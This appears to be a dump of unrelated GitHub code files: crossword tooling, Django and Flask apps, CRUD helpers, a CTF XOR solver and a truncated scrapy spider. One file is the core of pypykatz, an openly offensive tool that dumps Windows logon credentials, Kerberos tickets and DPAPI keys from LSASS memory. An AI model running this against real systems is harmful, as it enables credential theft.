s1,\\\n\t\t\t\t\t\t\tr2, s2))\n\t\t\t\t\t\tif r2 == ans or r1 == ans: break\n\t\t\t\t\tfout.write(\"\\n\")\n\t\t\t\t# print(\"prob\", wiki_res_prob)\n\t\t\t\t# print(\"score\", wiki_res)\n\t\t\t\t# input()\n\t\t\t\t# rank = -1\n\t\t\t\t# for i, (w, s, _) in enumerate(ret):\n\t\t\t\t# \tif ans == w:\n\t\t\t\t# \t\trank = i+1\n\t\t\t\t# \t\tbreak\n\t\t\t\t# t += rank > 0\n\t\t\t\t# fout.write(\"%s\\t%s. 
%s\\t%s\\t%+d\\n\"%(date, index, clue, ans, rank))\n\t\t\t\t# for w, s, _ in ret:\n\t\t\t\t# \tfout.write(\"\\t%s\\t%.4e\\n\"%(w, s))\n\tbf.save_buf()\n\tprint(\"total %d samples, %d %s better, %d %s better\"%(n, n1, m1name, n2, m2name))\n\tprint(\"%s MRR=%.4f\\t%s MRR=%.4f\"%(m1name, rr1/n*100, m2name, rr2/n*100))\ndef tune(odir=\"outputs/fillblanks\", limit=100, cluefile=\"data/clues_for_test.txt\", \\\netas=[0, 0.05, 0.1, 0.15, 0.2, 0.25, 0.3, 0.35, 0.4], smooths=[1, 2, 3, 4]):\n\tbf = BlankFillerProb()\n\tn = tot = 0\n\thits = {sm: {int(r*100):0 for r in etas} for sm in smooths}\n\twith open(cluefile, encoding=\"utf-8\") as fin, \\\n\topen(join(odir, \"tuning_norm.txt\"), \"w\", encoding=\"utf-8\") as fout:\n\t\tfor line in fin:\n\t\t\titem = json.loads(line.strip())\n\t\t\tclue, ans = item[\"clue\"], item[\"answer\"]\n\t\t\tif \"___\" in clue:\n\t\t\t\tn += 1\n\t\t\t\tfor sm in hits:\n\t\t\t\t\tbf.smooth = 10**(-sm)\n\t\t\t\t\tfor r in hits[sm]:\n\t\t\t\t\t\tret = bf.generate(clue, len(ans), limit, eta=r/100)\n\t\t\t\t\t\trank = get_rank(ret, ans)\n\t\t\t\t\t\tif rank <= len(ret):\n\t\t\t\t\t\t\thits[sm][r] += 1/rank\n\t\t\ttot += 1\n\t\trestr = \"samples\\t%d/%d=%.2f%%\\n\"%(n, tot, n/tot*100)\n\t\tfout.write(restr)\n\t\tprint(restr, end=\"\")\n\t\tfor s, h in sorted(hits.items()):\n\t\t\tfor r, t in h.items():\n\t\t\t\trestr = \"smooth=%d\\teta=%.2f\\tMRR=%f%%\\n\"%(s, r/100, t*100/n)\n\t\t\t\tfout.write(restr)\n\t\t\t\tprint(restr, end=\"\")\n\t\t\tfout.write(\"\\n\")\n\t\t\tprint()\nif __name__ == \"__main__\":\n\t\n\t# clue, length = \"\\\"So ___?\\\"\", 4 # (\"___ fraiche\", 5, max_masked_words=1) # (\"\\\"___: Uprising\\\" (Disney animated series)\", 4)\n\t# ret = bf.fill(clue, length, max_masked_words=1)\n\t# for r in ret: print(r)\n\n\t# bf = BlankFiller()\n\t# ret = bf.fill_by_wiki(\"\\\"___: Uprising\\\" (Disney animated series)\", 4)\n\t# for r in ret: print(r)\n\n\t#test_fill()\n\tdebug_fill()\n\t#tune(etas=[i/100 for i in range(20)])\n\t#debug_fill()\n\t# bf = BlankFillerProb()\n\t# clue = \"\\\"Don't ___!\\\"\"\n\t# for item in bf.retrieve(clue, 20):\n\t# \tprint(item[\"_score\"], item[\"_source\"])\n\t# for item in bf.fill_by_wiki(clue, 3):\n\t# \tprint(item)\n\t# for (clue, length) in [(\"___ hot\", 4), (\"__ spit\", 4)]:\n\t# \tprint(clue, length)\n\t# \tfor r in bf.generate(clue, length):\n\t# \t\tprint(\"\\t\", r)\n","repo_name":"lhlclhl/CP","sub_path":"cps/fillblank.py","file_name":"fillblank.py","file_ext":"py","file_size_in_byte":15226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1674081546","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.urls import reverse_lazy\nimport json\n\n# from 3rd apps\n\n# models\n\nfrom etilog.models import (Company, Reference, Country,\n SustainabilityTag, ActivityCategory)\n\n# forms\nfrom etilog.forms.forms_filter import (SearchForm, OverviewFiltHeaderForm, OverviewFHiddenForm,\n OverviewFForm\n )\nfrom etilog.forms.forms_suggestions import TopicForm\n\nfrom etilog.ViewLogic.ImpevView import get_results, filter_results\n\n\ndef overview_impevs(request, reqtype=None):\n\n landing = False\n if len(request.GET) == 0: # firsttime\n jsondata = json.dumps(False) # False #Table(table_qs)\n landing = True\n\n else:\n d_dict = filter_results(request)\n jsondata = json.dumps(d_dict)\n\n searchform = SearchForm(landing) # Filter ServerSide\n topicforms = []\n if landing:\n suggestions = ['tags', 'company', 'industry']\n\n for n in 
suggestions:\n tform = TopicForm(n)\n topicforms.append(tform)\n\n filtheader = OverviewFiltHeaderForm()\n filterhidden = OverviewFHiddenForm()\n filtform = OverviewFForm()\n\n return render(request, 'etilog/overview.html', {\n 'filter': filterhidden,\n 'filterform': filtform,\n 'filtheader': filtheader,\n 'searchform': searchform,\n 'topicforms': topicforms,\n 'landing': landing,\n 'jsondata': jsondata,\n })\n\n\ndef filter_impevs(request):\n d_dict = filter_results(request)\n jsondata = json.dumps(d_dict)\n return HttpResponse(jsondata, content_type='application/json')\n\n\ndef get_result(request):\n d_dict = {}\n get_results(request, d_dict)\n jsondata = json.dumps(d_dict)\n return HttpResponse(jsondata, content_type='application/json')\n\n\ndef load_names(request, modelname, query=None):\n if modelname == 'company':\n q_names = Company.objects.exclude(impevents=None\n ).values('id', 'name')\n\n elif modelname == 'reference':\n q_names = Reference.objects.values('id', 'name')\n elif modelname == 'country':\n q_names = Country.objects.values('id', 'name')\n elif modelname == 'tags':\n q_names = SustainabilityTag.objects.values('id', 'name')\n elif modelname == 'industry':\n q_comps = Company.objects.exclude(impevents=None\n ).values_list('activity_id', flat=True).distinct()\n q_names = ActivityCategory.objects.filter(id__in=q_comps\n ).values('id', 'name')\n\n elif modelname == 'company_all':\n q_names = Company.objects.values('id', 'name')\n else:\n return HttpResponse(\"/\")\n\n if query:\n q_names = q_names.filter(name__icontains=query)\n data = json.dumps(list(q_names))\n return HttpResponse(data, content_type='application/json')\n\n\n","repo_name":"hodeld/etiki-prototype1","sub_path":"etilog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2973,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"32414180198","text":"#!/usr/bin/env python3\n#\n# Author:\n# Tamas Jos (@skelsec)\n#\n\nimport platform\nimport json\n\nfrom pypykatz.commons.common import KatzSystemInfo\nfrom pypykatz.lsadecryptor import CredmanTemplate, MsvTemplate, \\\n\tMsvDecryptor, WdigestTemplate, LsaTemplate, WdigestDecryptor, \\\n\tLiveSspTemplate, LiveSspDecryptor, SspDecryptor, SspTemplate, \\\n\tTspkgDecryptor, TspkgTemplate, KerberosTemplate, KerberosDecryptor, \\\n\tDpapiTemplate, DpapiDecryptor, LsaDecryptor\n\nfrom pypykatz.lsadecryptor.packages.msv.decryptor import LogonSession\nfrom pypykatz import logger\nfrom pypykatz.commons.common import UniversalEncoder\nfrom minidump.minidumpfile import MinidumpFile\nfrom minikerberos.common.ccache import CCACHE\nfrom pypykatz._version import __version__\n\nclass pypykatz:\n\tdef __init__(self, reader, sysinfo):\n\t\tself.reader = reader\n\t\tself.sysinfo = sysinfo\n\t\tself.credentials = []\n\t\tself.architecture = None\n\t\tself.operating_system = None\n\t\tself.buildnumber = None\n\t\tself.lsa_decryptor = None\n\t\t\n\t\tself.logon_sessions = {}\n\t\tself.orphaned_creds = []\n\t\tself.kerberos_ccache = CCACHE()\n\t\t\n\tdef to_dict(self):\n\t\tt = {}\n\t\tt['logon_sessions'] = {}\n\t\tfor ls in self.logon_sessions:\n\t\t\t# print(ls)\n\t\t\tt['logon_sessions'][ls] = (self.logon_sessions[ls].to_dict())\n\t\tt['orphaned_creds'] = []\n\t\tfor oc in self.orphaned_creds:\n\t\t\tt['orphaned_creds'].append(oc.to_dict())\n\t\treturn t\n\t\t\n\tdef to_json(self):\n\t\treturn json.dumps(self.to_dict(), cls = UniversalEncoder, indent=4, sort_keys=True)\n\n\tdef to_grep(self):\n\t\tres = 
':'.join(LogonSession.grep_header) + '\\r\\n'\n\t\tfor luid in self.logon_sessions:\n\t\t\tfor row in self.logon_sessions[luid].to_grep_rows():\n\t\t\t\tres += ':'.join(row) + '\\r\\n'\n\t\t\t\tfor cred in self.orphaned_creds:\n\t\t\t\t\tt = cred.to_dict()\n\t\t\t\t\tif t['credtype'] != 'dpapi':\n\t\t\t\t\t\tif t['password'] is not None:\n\t\t\t\t\t\t\tx = [str(t['credtype']), str(t['domainname']), str(t['username']), '', '', '', '', '', str(t['password'])]\n\t\t\t\t\t\t\tres += ':'.join(x) + '\\r\\n'\n\t\t\t\t\telse:\n\t\t\t\t\t\tt = cred.to_dict()\n\t\t\t\t\t\tx = [str(t['credtype']), '', '', '', '', '', str(t['masterkey']), str(t['sha1_masterkey']), str(t['key_guid']), '']\n\t\t\t\t\t\tres += ':'.join(x) + '\\r\\n'\n\n\t\treturn res\n\n\tdef __str__(self):\n\t\tres = '== Logon credentials ==\\r\\n'\n\t\tfor luid in self.logon_sessions:\n\t\t\tres += str(self.logon_sessions[luid]) + '\\r\\n'\n\t\t\t\n\t\tif len(self.orphaned_creds) > 0:\n\t\t\tres += '== Orphaned credentials ==\\r\\n'\n\t\t\tfor cred in self.orphaned_creds:\n\t\t\t\tres += str(cred) + '\\r\\n'\n\t\t\n\t\treturn res\n\n\t@staticmethod\n\tdef go_live():\n\t\tif platform.system() != 'Windows':\n\t\t\traise Exception('Live parsing will only work on Windows')\n\t\tfrom pypykatz.commons.readers.local.live_reader import LiveReader\n\t\treader = LiveReader()\n\t\tsysinfo = KatzSystemInfo.from_live_reader(reader)\n\t\tmimi = pypykatz(reader.get_buffered_reader(), sysinfo)\n\t\tmimi.start()\n\t\treturn mimi\n\n\t@staticmethod\n\tdef go_live_phandle(lsass_process_handle):\n\t\tif platform.system() != 'Windows':\n\t\t\traise Exception('Live parsing will only work on Windows')\n\t\tfrom pypykatz.commons.readers.local.live_reader import LiveReader\n\t\treader = LiveReader(lsass_process_handle=lsass_process_handle)\n\t\tsysinfo = KatzSystemInfo.from_live_reader(reader)\n\t\tmimi = pypykatz(reader.get_buffered_reader(), sysinfo)\n\t\tmimi.start()\n\t\treturn mimi\n\t\t\n\t@staticmethod\n\tdef parse_minidump_file(filename):\n\t\ttry:\n\t\t\tminidump = MinidumpFile.parse(filename)\n\t\t\treader = minidump.get_reader().get_buffered_reader()\n\t\t\tsysinfo = KatzSystemInfo.from_minidump(minidump)\n\t\texcept Exception as e:\n\t\t\tlogger.exception('Minidump parsing error!')\n\t\t\traise e\n\t\ttry:\n\t\t\tmimi = pypykatz(reader, sysinfo)\n\t\t\tmimi.start()\n\t\texcept Exception as e:\n\t\t\t#logger.info('Credentials parsing error!')\n\t\t\tmimi.log_basic_info()\n\t\t\traise e\n\t\treturn mimi\n\n\t@staticmethod\n\tdef parse_minidump_bytes(data):\n\t\t\"\"\"\n\t\tParses LSASS minidump file bytes.\n\t\tdata needs to be bytearray\n\t\t\"\"\"\n\t\tminidump = MinidumpFile.parse_bytes(data)\n\t\treader = minidump.get_reader().get_buffered_reader()\n\t\tsysinfo = KatzSystemInfo.from_minidump(minidump)\n\t\tmimi = pypykatz(reader, sysinfo)\n\t\tmimi.start()\n\t\treturn mimi\n\n\t@staticmethod\n\tdef parse_minidump_external(handle):\n\t\t\"\"\"\n\t\tParses LSASS minidump file based on the file object.\n\t\tFile object can really be any object as longs as \n\t\tit implements read, seek, tell functions with the \n\t\tsame parameters as a file object would.\n\n\t\thandle: file like object\n\t\t\"\"\"\n\t\tminidump = MinidumpFile.parse_external(handle)\n\t\treader = minidump.get_reader().get_buffered_reader()\n\t\tsysinfo = KatzSystemInfo.from_minidump(minidump)\n\t\tmimi = pypykatz(reader, sysinfo)\n\t\tmimi.start()\n\t\treturn mimi\n\t\n\t@staticmethod\n\tdef parse_minidump_buffer(buff):\n\t\t\"\"\"\n\t\tParses LSASS minidump file which contents are 
in a bytes buffer\n\t\tbuff: io.BytesIO object\n\t\t\"\"\"\n\t\tminidump = MinidumpFile.parse_buff(buff)\n\t\treader = minidump.get_reader().get_buffered_reader()\n\t\tsysinfo = KatzSystemInfo.from_minidump(minidump)\n\t\tmimi = pypykatz(reader, sysinfo)\n\t\tmimi.start()\n\t\treturn mimi\n\n\t@staticmethod\n\tdef parse_memory_dump_rekall(filename, override_timestamp = None):\n\t\tfrom pypykatz.commons.readers.rekall.rekallreader import RekallReader\n\t\treader = RekallReader.from_memory_file(filename, override_timestamp)\n\t\tsysinfo = KatzSystemInfo.from_rekallreader(reader)\n\t\tmimi = pypykatz(reader, sysinfo)\n\t\tmimi.start()\n\t\treturn mimi\n\n\t@staticmethod\n\tdef go_rekall(session, override_timestamp = None, buildnumber = None):\n\t\tfrom pypykatz.commons.readers.rekall.rekallreader import RekallReader\n\t\treader = RekallReader.from_session(session, override_timestamp, buildnumber)\n\t\tsysinfo = KatzSystemInfo.from_rekallreader(reader)\n\t\tmimi = pypykatz(reader, sysinfo)\n\t\tmimi.start()\n\t\treturn mimi\n\n\t@staticmethod\n\tdef go_volatility3(vol3_obj):\n\t\tfrom pypykatz.commons.readers.volatility3.volreader import Vol3Reader, vol3_treegrid\n\t\treader = Vol3Reader(vol3_obj)\n\t\tsysinfo = reader.get_sysinfo()\n\t\tmimi = pypykatz(reader, sysinfo)\n\t\tmimi.start()\n\t\treturn vol3_treegrid(mimi)\n\n\t\t\n\tdef log_basic_info(self):\n\t\t\"\"\"\n\t\tIn case of error, please attach this to the issues page\n\t\t\"\"\"\n\t\tlogger.info('===== BASIC INFO. SUBMIT THIS IF THERE IS AN ISSUE =====')\n\t\tlogger.info('pypyKatz version: %s' % __version__)\n\t\tlogger.info('CPU arch: %s' % self.sysinfo.architecture.name)\n\t\tlogger.info('OS: %s' % self.sysinfo.operating_system)\n\t\tlogger.info('BuildNumber: %s' % self.sysinfo.buildnumber)\n\t\tlogger.info('MajorVersion: %s ' % self.sysinfo.major_version)\n\t\tlogger.info('MSV timestamp: %s' % self.sysinfo.msv_dll_timestamp)\n\t\tlogger.info('===== BASIC INFO END =====')\n\t\t\n\tdef get_logoncreds(self):\n\t\tcredman_template = CredmanTemplate.get_template(self.sysinfo)\n\t\tmsv_template = MsvTemplate.get_template(self.sysinfo)\n\t\tlogoncred_decryptor = MsvDecryptor(self.reader, msv_template, self.lsa_decryptor, credman_template, self.sysinfo)\n\t\tlogoncred_decryptor.start()\n\t\tself.logon_sessions = logoncred_decryptor.logon_sessions\n\n\tdef get_lsa_bruteforce(self):\n\t\t#good luck!\n\t\tlogger.debug('Testing all available templates! Expect warnings!')\n\t\tfor lsa_dec_template in LsaTemplate.get_template_brute(self.sysinfo):\n\t\t\ttry:\n\t\t\t\tlsa_dec = LsaDecryptor.choose(self.reader, lsa_dec_template, self.sysinfo)\n\t\t\t\tlogger.debug(lsa_dec.dump())\n\t\t\texcept:\n\t\t\t\tpass\n\t\t\telse:\n\t\t\t\tlogger.debug('Lucky you! Brutefoce method found a -probably- working template!')\n\t\t\t\treturn lsa_dec\n\t\n\tdef get_lsa(self):\n\t\t#trying with automatic template detection\n\t\ttry:\n\t\t\tlsa_dec_template = LsaTemplate.get_template(self.sysinfo)\n\t\t\tlsa_dec = LsaDecryptor.choose(self.reader, lsa_dec_template, self.sysinfo)\n\t\t\tlogger.debug(lsa_dec.dump())\n\t\texcept Exception as e:\n\t\t\tlogger.debug('Failed to automatically detect correct LSA template! 
Reason: %s' % str(e))\n\t\t\tlsa_dec = self.get_lsa_bruteforce()\n\t\t\tif lsa_dec is None:\n\t\t\t\traise Exception('All detection methods failed.')\n\t\t\treturn lsa_dec\n\t\telse:\n\t\t\treturn lsa_dec\n\t\n\tdef get_wdigest(self):\n\t\tdecryptor_template = WdigestTemplate.get_template(self.sysinfo)\n\t\tdecryptor = WdigestDecryptor(self.reader, decryptor_template, self.lsa_decryptor, self.sysinfo)\n\t\tdecryptor.start()\n\t\tfor cred in decryptor.credentials:\n\t\t\tif cred.luid in self.logon_sessions:\n\t\t\t\tself.logon_sessions[cred.luid].wdigest_creds.append(cred)\n\t\t\telse:\n\t\t\t\tself.orphaned_creds.append(cred)\n\t\n\tdef get_tspkg(self):\n\t\ttspkg_dec_template = TspkgTemplate.get_template(self.sysinfo)\n\t\ttspkg_dec = TspkgDecryptor(self.reader,tspkg_dec_template, self.lsa_decryptor, self.sysinfo)\n\t\ttspkg_dec.start()\n\t\tfor cred in tspkg_dec.credentials:\n\t\t\tif cred.luid in self.logon_sessions:\n\t\t\t\tself.logon_sessions[cred.luid].tspkg_creds.append(cred)\n\t\t\telse:\n\t\t\t\tself.orphaned_creds.append(cred)\n\t\t\t\t\n\tdef get_ssp(self):\n\t\tdec_template = SspTemplate.get_template(self.sysinfo)\n\t\tdec = SspDecryptor(self.reader, dec_template, self.lsa_decryptor, self.sysinfo)\n\t\tdec.start()\n\t\tfor cred in dec.credentials:\n\t\t\tif cred.luid in self.logon_sessions:\n\t\t\t\tself.logon_sessions[cred.luid].ssp_creds.append(cred)\n\t\t\telse:\n\t\t\t\tself.orphaned_creds.append(cred)\n\t\t\t\t\n\tdef get_livessp(self):\n\t\tlivessp_dec_template = LiveSspTemplate.get_template(self.sysinfo)\n\t\tlivessp_dec = LiveSspDecryptor(self.reader, livessp_dec_template, self.lsa_decryptor, self.sysinfo)\n\t\tlivessp_dec.start()\n\t\tfor cred in livessp_dec.credentials:\n\t\t\tif cred.luid in self.logon_sessions:\n\t\t\t\tself.logon_sessions[cred.luid].livessp_creds.append(cred)\n\t\t\telse:\n\t\t\t\tself.orphaned_creds.append(cred)\n\t\t\t\t\n\tdef get_dpapi(self):\n\t\tdec_template = DpapiTemplate.get_template(self.sysinfo)\n\t\tdec = DpapiDecryptor(self.reader, dec_template, self.lsa_decryptor, self.sysinfo)\n\t\tdec.start()\n\t\tfor cred in dec.credentials:\n\t\t\tif cred.luid in self.logon_sessions:\n\t\t\t\tself.logon_sessions[cred.luid].dpapi_creds.append(cred)\n\t\t\telse:\n\t\t\t\tself.orphaned_creds.append(cred)\n\t\n\tdef get_kerberos(self):\n\t\tdec_template = KerberosTemplate.get_template(self.sysinfo)\n\t\tdec = KerberosDecryptor(self.reader, dec_template, self.lsa_decryptor, self.sysinfo)\n\t\tdec.start()\t\n\t\tfor cred in dec.credentials:\n\t\t\tfor ticket in cred.tickets:\n\t\t\t\tfor fn in ticket.kirbi_data:\n\t\t\t\t\tself.kerberos_ccache.add_kirbi(ticket.kirbi_data[fn].native)\n\t\t\t\n\t\t\tif cred.luid in self.logon_sessions:\n\t\t\t\tself.logon_sessions[cred.luid].kerberos_creds.append(cred)\n\t\t\telse:\n\t\t\t\tself.orphaned_creds.append(cred)\n\t\n\tdef start(self):\n\t\t#self.log_basic_info()\n\t\t#input()\n\t\tself.lsa_decryptor = self.get_lsa()\n\t\tself.get_logoncreds()\n\t\tself.get_wdigest()\n\t\tself.get_kerberos()\n\t\tself.get_tspkg()\n\t\tself.get_ssp()\n\t\tself.get_livessp()\n\t\tself.get_dpapi()\n","repo_name":"ryanmrestivo/red-team","sub_path":"Exploitation-Tools/CrackMapExec/site-packages/pypykatz/pypykatz.py","file_name":"pypykatz.py","file_ext":"py","file_size_in_byte":10463,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"21"} +{"seq_id":"7465767214","text":"def sum_of_squares(num):\n '''\n Assumes num is a positive integer\n Returns the sum of squares of all odd positive 
integers smaller than num.\n    '''\n    \n    empty_list = []\n    for i in range(1,num,2):\n        empty_list.append(i**2)\n    \n    return sum(empty_list)\n    \nnum = int(input('Enter a positive number: '))\n\nwhile num <= 0:\n    print('The number entered is not positive')\n    num = int(input('Enter a positive number: '))\n\nprint(sum_of_squares(num))\n","repo_name":"donaldmenezes/Solving-Problems-with-Python","sub_path":"goodrich/Chapter_1/R-1.6.py","file_name":"R-1.6.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"32930455841","text":"from flask import Flask, jsonify\napp = Flask(__name__)\n\n@app.route('/')\ndef Saize():\n    return 'Mohammad Saize Ali'\n\n# the route needs an int converter so Flask can pass n into the view\n@app.route('/armstrong/<int:n>')\ndef armstrong(n):\n    total = 0\n    order = len(str(n))\n    copy = n\n    while(n > 0):\n        digit = n % 10\n        total += digit ** order\n        n = n // 10\n\n    if(total == copy):\n        print(f\"{copy} is an armstrong number\")\n        return \"True\"\n\n    else:\n        print(f\"{copy} is not an armstrong number\")\n        return \"False\"\n\n\nif __name__ == \"__main__\":\n    app.run(debug=True)","repo_name":"Saize1/Flask-API","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"4665151725","text":"import os\nfrom setuptools import find_packages, setup\n\nwith open(os.path.join(os.path.dirname(__file__), 'README.rst')) as readme:\n    README = readme.read()\n\n# allow setup.py to be run from any path\nos.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))\n\nsetup(\n    name='slider',\n    version='0.1',\n    packages=find_packages(),\n    include_package_data=True,\n    license='No License',  # example license\n    description='A starter template for a slider.',\n    long_description=README,\n    url='https://vk.com/lastdreamer/',\n    author='Олег Кравченко',\n    author_email='oleg.kravchenko88@gmail.com',\n    classifiers=[\n        'Environment :: Web Environment',\n        'Framework :: Django',\n        'Framework :: Django :: X.Y',  # replace \"X.Y\" as appropriate\n        'Intended Audience :: Developers',\n        'License :: NO License :: NO License',  # example license\n        'Operating System :: OS Independent',\n        'Programming Language :: Python',\n        # Replace these appropriately if you are stuck on Python 2.\n        'Programming Language :: Python :: 3',\n        'Programming Language :: Python :: 3.4',\n        'Programming Language :: Python :: 3.5',\n        'Topic :: Internet :: WWW/HTTP',\n        'Topic :: Internet :: WWW/HTTP :: Dynamic Content',\n    ],\n)\n","repo_name":"LastDreamer/django-common-apps","sub_path":"slider/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"71246450293","text":"from django import forms\n\nfrom .models import Task, Team, Comment\nfrom django.contrib.auth.models import User\nfrom django.db.models import Q\n\n\nclass TeamForm(forms.ModelForm):\n\n    class Meta:\n        model = Team\n        fields = ('name', 'members')\n\n\nclass TaskForm(forms.ModelForm):\n    class Meta:\n        model = Task\n        fields = ('assignee', 'title', 'text', 'status',)\n\n    def __init__(self, *args, **kwargs):\n        super().__init__(*args, **kwargs)\n        self.fields['title'].required = True\n        self.fields['assignee'].required = True\n\n\nclass CommentForm(forms.ModelForm):\n\n    class Meta:\n        model = Comment\n        fields = ('text',)\n\n\nclass SelectTeamForm(forms.Form):\n    team = forms.ModelChoiceField(queryset=None, empty_label=\"Leave this field blank and click on proceed to set assignee as self\")\n\n    def __init__(self, request, *args, **kwargs):\n        super().__init__(*args, **kwargs)\n        self.fields['team'].required = False\n        teams = Team.objects.filter(Q(members__username=request.user) | Q(creator=request.user)).distinct()\n        if not teams:\n            self.fields['team'].queryset = Team.objects.none()\n        else:\n            self.fields['team'].queryset = teams\n\n    class Meta:\n        fields = ('team',)\n","repo_name":"makrandr1999/fsf_2019_screening_task1","sub_path":"taskman/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"37849936006","text":"from typing import List\n\nfrom fastapi.encoders import jsonable_encoder\nfrom sqlalchemy.orm import Session\n\nfrom app.crud.base import CRUDBase\nfrom app.models.challenge_user_detail import ChallengeUserDetail\nfrom app.schemas.challenge_user_detail import ChallengeUserDetailCreate, ChallengeUserDetailUpdate\nfrom app.models.user import User\n# from app.schemas.item import ItemCreate, ItemUpdate\n\n\nclass CRUDChallengeUsers(CRUDBase[ChallengeUserDetail, ChallengeUserDetailCreate, ChallengeUserDetailUpdate]):\n    def create_with_user(\n        self, db: Session, *, obj_in: ChallengeUserDetailCreate, user_id: int\n    ) -> ChallengeUserDetail:\n        obj_in_data = jsonable_encoder(obj_in)\n        db_obj = self.model(**obj_in_data, user_id=user_id)\n        db.add(db_obj)\n        db.commit()\n        db.refresh(db_obj)\n        return db_obj\n\n    def get_multi_by_challenge(\n        self, db: Session, *, challenge_id: str\n    ) -> List[User]:\n        details = db.query(self.model).filter(\n            self.model.challenge_id == challenge_id).all()\n        users = list(map(lambda el: el.user, details))\n        return users\n\n    def get_is_challenge_master(\n        self, db: Session, *, challenge_id: str, user_id: str\n    ) -> bool:\n        details = (db.query(self.model)\n                   .filter(self.model.challenge_id == challenge_id)\n                   .filter(self.model.is_master == True)\n                   # compare the column to the argument; comparing user_id to itself was always true\n                   .filter(self.model.user_id == user_id)\n                   .all())\n        return len(details) > 0\n\n    def get_is_challenge_user(\n        self, db: Session, *, challenge_id: str, user_id: str\n    ) -> bool:\n        details = (db.query(self.model)\n                   .filter(self.model.challenge_id == challenge_id)\n                   .filter(self.model.user_id == user_id).all())\n        return len(details) > 0\n\n\nchallenge_users = CRUDChallengeUsers(ChallengeUserDetail)\n","repo_name":"RECODE01/ddudu-todo-server","sub_path":"backend/app/app/crud/crud_challenge_user_detail.py","file_name":"crud_challenge_user_detail.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"3115259721","text":"import pathlib\n\ndefault_install_path = pathlib.Path('C:/Program Files (x86)/Windows Kits/10')\n\nclass WinSdkConfig:\n    \"\"\"\n    Gather information about a particular WinSDK distribution\n    \"\"\"\n    def __init__(self, version):\n        self.version = version\n        self.install_path = default_install_path\n        self.include_path = self.install_path / 'Include' / self.version\n        self.lib_path = self.install_path / 'Lib' / self.version\n        self.install_path.resolve()\n        self.include_path.resolve()\n        self.lib_path.resolve()\n\n        if not self.include_path.exists() or not self.lib_path.exists():\n            raise Exception(\"WinSDK version '{}' has not been found\".format(version))\n\n    def __str__(self):\n        result = 'WinSDK Config version: {}\\n'.format(self.version)\n        result += 
'install_path={}\\n'.format(self.install_path)\n        result += 'winsdk_include_path={}\\n'.format(self.include_path)\n        result += 'winsdk_lib_path={}\\n'.format(self.lib_path)\n\n        return result\n\ndef get_version_list():\n    \"\"\"\n    Return the list of all WinSDK 10 versions installed locally.\n    Note: unfortunately I don't know how to programmatically find the WinSDK path,\n    so I am testing the default 'Program Files' path.\n    \"\"\"\n    if not default_install_path.exists() or not default_install_path.is_dir():\n        return set()\n\n    include = default_install_path / 'Include'\n    include_versions = set()\n    for f in include.iterdir():\n        include_versions.add(f.name)\n\n    include = default_install_path / 'Lib'\n    lib_versions = set()\n    for f in include.iterdir():\n        lib_versions.add(f.name)\n\n    return include_versions & lib_versions\n\ndef get_latest_version():\n    \"\"\"\n    Return the most recent version of WinSDK installed locally.\n    \"\"\"\n    versions = get_version_list()\n\n    if len(versions) == 0:\n        return None\n\n    expanded_versions = [x.split('.') for x in versions]\n    sorted_versions = ['.'.join(k) for k in sorted(expanded_versions, reverse=True)]\n\n    assert(len(sorted_versions) > 0)\n\n    return sorted_versions[0]\n\ndef get_latest_config():\n    return WinSdkConfig(get_latest_version())\n\ndef get_config(version):\n    return WinSdkConfig(version)\n\ndef test_print():\n    print(get_latest_config())\n","repo_name":"Dragnalith/build_system_experiment","sub_path":"project/build/tool/gbuild/sdk/winsdk.py","file_name":"winsdk.py","file_ext":"py","file_size_in_byte":2287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"841873551","text":"import base64\nimport binhex\nimport os\nimport xortool\n\n\"\"\"\nxortool -x -l 5 -c \"0x20\" mbxor_cipher.txt --> to give key\n\"\"\"\n\ndef solve():\n    with open(\"mbxor_cipher.txt\") as cipher:\n        line = cipher.readline()\n        hex_line = bytearray.fromhex(line)\n        x = xor(hex_line)\n        print(x)\n\n\ndef xor(line):\n    result = \"\"\n    key = [0x57, 0x47, 0x75, 0x58, 0x6e]\n    for idx, c in enumerate(line):\n        # iterating a bytearray already yields ints, so XOR directly\n        result += chr(c ^ key[idx % 5])\n    return result\n\n\nkey = \"WGuXn\"\n\nsolve()","repo_name":"iownthishuman/pythonProject","sub_path":"offsec-course/mbxor.py","file_name":"mbxor.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"21560191773","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy.linkextractors import LinkExtractor\nfrom scrapy.spiders import CrawlSpider, Rule\nfrom jianshu.items import JianshuItem\n\nclass JsspiderSpider(CrawlSpider):\n    name = 'jsspider'\n    allowed_domains = ['jianshu.com']\n    start_urls = ['https://www.jianshu.com/']\n\n    rules = (\n        Rule(LinkExtractor(allow=r'.*/p/[0-9a-z]{12}.*'), callback='parse_detail', follow=True),\n    )\n    def parse_detail(self, response):\n        # extract the article title\n        title = response.xpath('//h1[@class=\"title\"]/text()').get()\n        # extract the author's avatar URL\n        avatar = response.xpath('//a[@class=\"avatar\"]/img/@src').get()\n        # extract the article author\n        author = response.xpath('//span[@class=\"name\"]/a/text()').get()\n        # extract the publish time\n        pub_time = response.xpath('//span[@class=\"publish-time\"]/text()').get()\n        # the article's storage address (URL)\n        orginal_id = response.url\n        article = 